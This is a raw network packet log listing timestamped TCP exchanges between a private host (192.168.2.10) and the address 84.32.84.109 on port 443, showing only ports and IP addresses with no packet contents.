Oct 9, 2024 16:16:05.814804077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.814852953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.814888000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.814944983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.817660093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.817740917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823263884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823329926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823337078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823354959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823383093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823388100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823411942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823421001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823451996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823451996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823460102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823474884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823527098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823550940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823556900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823570967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823580027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823616982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823622942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823630095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823684931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823717117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823741913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823741913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823749065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.823767900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.823795080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.839569092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.839667082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.839807034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.839858055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.839867115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.839914083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.839946032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.839987993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.863159895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.863215923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.863233089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.863243103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.863256931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.863256931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.863279104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.863285065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.863311052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.863317966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.863362074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.863368034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.863415003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.896647930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896722078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896727085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.896742105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896761894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.896785975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.896791935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896802902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896847963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.896853924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896899939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896936893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.896939039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896949053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.896986008 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.896991014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.897631884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.897684097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.897705078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.897711992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.897749901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.897754908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.897762060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.897800922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.897805929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.901734114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.901782036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.901782036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.901791096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.901825905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.901832104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.901896954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.901932955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.901941061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902291059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902329922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.902339935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902378082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902405977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.902411938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902463913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902497053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902498960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.902506113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902538061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.902544022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902606010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902622938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902642965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.902651072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.902684927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.902689934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905297995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905352116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905368090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905605078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905643940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905647993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905658007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905687094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905703068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905780077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905795097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905816078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905823946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905848980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905857086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905864954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905883074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905894041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905927896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905931950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905941963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.905966997 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.905998945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906035900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906037092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.906044960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906094074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906105042 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.906130075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.906137943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906152964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906173944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.906181097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906197071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.906200886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906265974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906285048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.906291962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.906305075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.933274031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.933319092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.933372021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.933392048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.933413029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.934165955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.934216022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.934216976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.934230089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.934257030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.956362009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.956428051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.956444979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.956481934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.956485987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.956513882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.956531048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.956609011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.956654072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.956659079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.956702948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.956758022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.956808090 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.984749079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.984869003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.984901905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.984956026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.984996080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.985045910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.985083103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.985142946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.985549927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.985606909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.985660076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.985713959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.989675045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.989725113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.989731073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.989748001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.989763021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.989972115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.990027905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.990036011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.990070105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.990144014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.990189075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.990223885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.990267992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.990294933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.990341902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993226051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.993279934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993339062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.993381023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993447065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.993485928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993608952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.993649006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993659019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.993742943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993757963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.993799925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993875027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.993915081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.993983984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.994021893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.994033098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.994097948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.994107008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.994144917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.994183064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.994220972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.020762920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.020844936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.020962954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.020983934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.021027088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.021713972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.021781921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.021872044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.021915913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.043618917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.043708086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.043756008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.043796062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.043797970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.043807983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.043832064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.043925047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.043967009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.043981075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.044018030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.072293997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.072374105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.072393894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.072436094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.072496891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.072535038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.072546959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.072560072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.072571993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.072608948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.073451042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.073496103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.073683023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.073724031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.077265024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.077318907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.077409983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.077522993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.077610970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.077656031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.077744007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.077790022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.077805996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.077845097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.077852964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.077866077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.077882051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.077903986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081235886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081301928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081312895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081352949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081376076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081413031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081415892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081423998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081450939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081463099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081618071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081651926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081665993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081677914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081690073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081696987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081707001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081715107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081737995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081741095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081785917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081793070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081829071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.081943035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081988096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.081995010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.082000971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.082026005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.082030058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.082040071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.082046986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.082061052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.082070112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.082110882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.082122087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.082150936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.108825922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.108861923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.108944893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.108963966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.108987093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.109008074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.109683990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.109734058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.109951973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.109996080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.131603956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.131669998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.131705046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.131721020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.131737947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.131757021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.131764889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.131813049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.131818056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.131861925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.160602093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.160676003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.160963058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.161025047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.161031008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.161051035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.161079884 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.161092997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.161138058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.161150932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.161190033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.161300898 CEST	443	49723	84.32.84.109	192.168.2.10
